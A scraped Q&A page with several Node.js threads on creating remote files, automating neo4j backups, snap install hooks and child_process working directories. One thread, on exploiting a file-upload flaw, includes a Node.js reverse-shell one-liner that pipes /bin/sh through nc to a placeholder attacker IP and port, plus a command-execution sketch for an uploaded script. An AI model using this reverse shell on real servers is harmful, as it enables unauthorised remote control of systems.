Create a file on remote server with nodejs - node.js

What is the easiest way to create a file on a remote server (accessible over SSH) in NodeJS?
Example: I work on my local computer, and there is a remote server with IP 192.168.1.100. I would like to create an empty text file on this server, in the path "/home/users/share".
I tried using an scp library in NodeJS, but could not copy my file to the remote server.

What do you mean?
If the file is created in a path that SSH has access to, and the permissions are set correctly, then the file will be accessible.
Do you want to generate data on the server and save it?
https://nodejs.org/api/fs.html#fs_fs_writefile_file_data_options_callback
Or do you want to choose a file from disk and upload it to the server? E.g.: https://www.w3schools.com/nodejs/nodejs_uploadfiles.asp
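If it is the first case (the data is generated by Node.js running on the server itself), here is a minimal fs.writeFile sketch; the file name empty.txt is just an example:
const fs = require('fs');

// Create an empty text file in the target directory.
fs.writeFile('/home/users/share/empty.txt', '', 'utf8', (err) => {
  if (err) {
    console.error('could not create the file:', err);
    return;
  }
  console.log('file created');
});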

If I understand correctly, you want to create a file on a different server using NodeJS and then access that file over SSH.
If your server runs Linux, you can use the rsync command from the terminal.
E.g. rsync --chmod=u+rwx,g+rwx,o+rwx /path/to/file server:/path/to/file
And if you want it done from NodeJS, you can use the child_process module to execute terminal commands:
const { exec } = require('child_process');

exec('rsync --chmod=u+rwx,g+rwx,o+rwx /path/to/file server:/path/to/file', (err) => {
  if (err) {
    // node couldn't execute the command
    return;
  }
});
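Since the question only needs an empty file on the remote host, an alternative sketch is to shell out to ssh and touch instead (this assumes key-based SSH authentication is already set up; the user name and file name are placeholders):
const { execFile } = require('child_process');

// Create an empty file on the remote server over SSH.
execFile('ssh', ['user@192.168.1.100', 'touch /home/users/share/newfile.txt'], (err) => {
  if (err) {
    console.error('ssh command failed:', err);
    return;
  }
  console.log('empty file created on the remote server');
});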

Related

Execute shell script for database backup

I have a ReactJS-neo4j application, deployed on a cloud server. Currently, I create backups of my databases manually.
Now I want to automate this process and execute the above query automatically every day.
Can anyone tell me how to automate the above process?
You need to change your neo4j configuration file, found in <HOME_neo4j>/conf/neo4j.conf, as below. The location of the file may differ if you are not using a Linux server such as Debian.
apoc.export.file.enabled=true
apoc.import.file.use_neo4j_config=false
The second line lets you save the JSON file to any folder you want, instead of only the default "import" folder.
Then open a terminal (or SSH session) connected to your cloud server, go to the <HOME_neo4j> directory where cypher-shell is installed, and run the one-liner below.
echo "CALL apoc.export.json.all(\"/home/backups/deploymentName/backup_mydeployment.json\", { useTypes: true } )" | bin/cypher-shell -u neo4j -p <awesome_psw> --format plain
This will save the JSON file in /home/backups/deploymentName, just like what you would do in the Neo4j browser.
I will leave it up to you to 1) add the YYMMDD0000_ timestamp to the filename via a Linux command and 2) schedule the job every midnight via crontab. Good luck!
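If you would rather drive the export from Node.js instead of a pure shell one-liner, here is a rough sketch that builds the YYMMDD0000_ prefix and shells out to cypher-shell. It assumes Node.js is installed on the server and the script is run from the <HOME_neo4j> directory; the paths and the <awesome_psw> placeholder come from the answer above and must be replaced with your own values:
const { exec } = require('child_process');

// Build a YYMMDD0000_ prefix, e.g. 2406150000_
const now = new Date();
const pad = (n) => String(n).padStart(2, '0');
const stamp = `${String(now.getFullYear()).slice(-2)}${pad(now.getMonth() + 1)}${pad(now.getDate())}0000_`;

const outFile = `/home/backups/deploymentName/${stamp}backup_mydeployment.json`;
const query = `CALL apoc.export.json.all(\\"${outFile}\\", { useTypes: true })`;

// Replace <awesome_psw> with the real password before running.
exec(`echo "${query}" | bin/cypher-shell -u neo4j -p <awesome_psw> --format plain`, (err, stdout, stderr) => {
  if (err) {
    console.error('backup failed:', stderr);
    return;
  }
  console.log(stdout);
});
A crontab entry pointing at this script would then take care of the nightly schedule.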

Saving a file in a Snap (Snapcraft) with NodeJS

I am having an issue with creating a new file while my snap is running; example:
1) The snap starts and checks for the config.json file at ./config/config.json
2) If that file is not found (it never is the first time the application runs), it creates it with fs.writeFile('./config/config.json', 'My Data', 'utf8', (err) => {....})
3) I then look for that file later and use it.
I am able to run my node app and everything works as expected when using node index.js.
It also works when I run it using snap try prime/ --devmode.
However, when running snap try prime/ I get this error in the syslog:
Error: ENOENT: no such file or directory, open './config/config.json'
It is erroring at the point of creation.
Any help with this would be awesome!! Thanks in advance.
I was able to solve this by NOT creating and checking for the config files in NodeJS, and moving all of that logic to an install hook (https://docs.snapcraft.io/build-snaps/hooks).
So now my install hook checks for the config file and creates it if it's not there; NodeJS then writes to that file later, so I can still make all the HTTP requests in NodeJS rather than in Bash. Below is my install hook; don't forget to make it executable.
This file is located at snap/hooks/install
#!/bin/sh
set -e

CONFIG_FILE="$SNAP_COMMON/config.json"

if [ ! -f "$CONFIG_FILE" ]; then
  # File not found, create it
  echo '{}' > "$CONFIG_FILE"
fi
Hope this helps someone!
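For the Node.js side of this, a minimal sketch of reading and updating the same file the hook created (the lastRun field is only an illustrative example, not from the original app):
const fs = require('fs');
const path = require('path');

// The install hook created $SNAP_COMMON/config.json, so read it from there.
const configFile = path.join(process.env.SNAP_COMMON || '.', 'config.json');

const config = JSON.parse(fs.readFileSync(configFile, 'utf8'));
config.lastRun = new Date().toISOString(); // hypothetical field
fs.writeFileSync(configFile, JSON.stringify(config, null, 2), 'utf8');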

NodeJS remote file upload vulnerability

I'm trying to learn the NodeJS pentesting process. I have found a remote file upload vulnerability in a NodeJS website. Can I upload a remote shell in NodeJS, like we do in PHP or ASPX, and execute commands? Can I upload a NodeJS shell.js and execute Unix commands on the server from that shell?
Not sure if this is what you're looking for, but if you have the ability to upload a NodeJS script to a server and execute it, then yes, you can run shell commands using child_process.exec (see here for a similar question/answer).
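For illustration, a minimal sketch of such a script that runs a Unix command and prints its output (this assumes the server actually executes whatever JavaScript file gets uploaded):
const { exec } = require('child_process');

// Run a Unix command and print whatever it returns.
exec('id; uname -a', (err, stdout, stderr) => {
  if (err) {
    console.error(stderr);
    return;
  }
  console.log(stdout);
});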
It's possible only if you can "execute" the file.
If you can execute JavaScript code, you could create a reverse shell using this:
(function () {
  require("child_process")
    .exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerIP> <attackerPort> >/tmp/f');
})();
Otherwise, if you can't execute the file, you will only see its contents:
https://myvulnerablewebsite.com/hack.js

Buildstops not creating file with exec in node js

I'm running two commands
indexer idx_name --rotate
indexer idx_name --buildstops dict_file 10
Everything is fine when I run these commands from the command line. However, when I run these two commands from my node application using exec, the first command works successfully but the second does not generate dict_file.
I tried some combinations with sudo, but it didn't help. I checked the stdout from both approaches (node and shell) and it looked the same.
Here is my node js code:
var exec = require('child_process').exec;
var cmd = 'indexer idx_name --rotate && indexer idx_name --buildstops dict_file 10';
exec(cmd, function(err, stdout, stderr) {
  console.log(stdout);
});
Is there something I'm missing ?
Whichever user is running node will need permission to write dict_file.
You might even find it easier to delete the file and let it be created by the right user via node (assuming that user can write to the folder).
Sudo could also work, but you will need to make sure the user running node has sudo permissions. Sorting that out is definitely outside the remit of Stack Overflow.
Also check that you are looking in the right place. In your example you don't show a path, so dict_file will just be created in the current working directory (which you can control from node; see the sketch below).
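Here is a minimal sketch that prints where node thinks it is running and pins the working directory for the child process explicitly; '/path/to/output' is only a placeholder:
const { exec } = require('child_process');

console.log('node is running in:', process.cwd());

const cmd = 'indexer idx_name --rotate && indexer idx_name --buildstops dict_file 10';

// Run the commands with an explicit working directory so dict_file
// ends up in a known, writable location.
exec(cmd, { cwd: '/path/to/output' }, (err, stdout, stderr) => {
  if (err) {
    console.error(stderr);
    return;
  }
  console.log(stdout);
});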

Run executable from local storage using Azure Web Role

I'm trying to run a simple executable using an Azure Web Role.
The executable is stored in the Web Role's local storage.
The executable produces a log.txt file once it has been run.
This is the method I am using to run the executable:
public void RunExecutable(string path)
{
    Process.Start(path);
}
Where path is localStorage.RootPath + "Application.exe"
The problem I am facing is that when I open the local storage folder, the executable is there; however, there is no log.txt file.
I have tested the executable, it works if I manually run it, it produces the log.txt file.
Can anyone see the problem?
Try setting an explicit WorkingDirectory for the process... I wonder if log.txt is being created, just not where you expect. (Or perhaps the app is trying to create log.txt but failing because of the permissions on the directory it's trying to create it in.)
If you remote desktop into the instance, can't you find the file created in the E:\approot\ folder? As Steve said, setting a WorkingDirectory for the process will fix the issue.
You can use Environment.GetEnvironmentVariable("RoleRoot") to construct the path to your application root.
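A minimal C# sketch of the WorkingDirectory suggestion, matching the snippet above; writing log.txt next to the executable is an assumption about what the executable expects:
using System.Diagnostics;
using System.IO;

public void RunExecutable(string path)
{
    var startInfo = new ProcessStartInfo
    {
        FileName = path,
        // Make log.txt land next to the executable instead of whatever
        // default directory the role host starts the process in.
        WorkingDirectory = Path.GetDirectoryName(path),
        UseShellExecute = false
    };
    Process.Start(startInfo);
}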
